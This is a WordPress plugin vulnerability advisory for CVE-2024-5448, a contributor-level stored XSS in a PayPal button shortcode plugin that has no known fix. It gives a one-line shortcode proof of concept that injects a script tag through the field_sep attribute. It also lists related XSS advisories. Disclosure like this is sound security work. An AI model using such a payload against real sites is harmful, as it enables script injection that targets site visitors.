PayPal Pay Now, Buy Now, Donation and Cart Buttons Shortcode <= 1.7 – Contributor+ Stored XSS | CVE 2024-5448 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

```
[paypal_button type="addtocart" name='name' amount="199: quantity="1-5" add_note="test note" quantity_txt_postfix="test postfix" field_sep="<script>alert(1)</script>"]
```

Affects Plugins

paypal-pay-buy-donation-and-cart-buttons-shortcode

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

c482fe19-b643-41ea-8194-22776b388290

Timeline

Publicly Published

2024-05-31 (about 30 days ago)

Added

2024-05-31 (about 29 days ago)

Last Updated

2024-05-31 (about 29 days ago)

Other

Published

Title

Published

2024-01-17

Title

WP Recipe Maker < 9.1.1 - Contributor+ Stored Cross-Site Scripting via header_tag

Published

2015-04-20

Title

Download Monitor < 1.7.1 - Reflected Cross-Site Scripting (XSS)

Published

2024-01-31

Title

Advanced iFrame < 2024.0 - Contributor+ Stored XSS

Published

2023-08-08

Title

Chatbot < 4.7.8 - Admin+ Stored XSS in FAQ Builder

Published

2023-08-16

Title

Video Grid < 1.22 - Reflected XSS